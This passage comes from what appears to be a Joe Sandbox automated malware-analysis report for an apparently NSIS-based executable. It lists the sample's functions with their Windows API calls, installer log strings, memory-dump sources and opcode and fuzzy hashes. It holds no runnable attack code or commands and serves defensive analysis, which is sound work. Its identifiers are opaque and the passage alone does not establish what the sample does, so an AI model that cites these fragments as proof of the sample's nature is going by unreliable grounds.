                                                                                                                                                                                                                                                                • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                                                • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                • String ID: $ @$M$N
                                                                                                                                                                                                                                                                • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                • String ID: F$A
                                                                                                                                                                                                                                                                • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
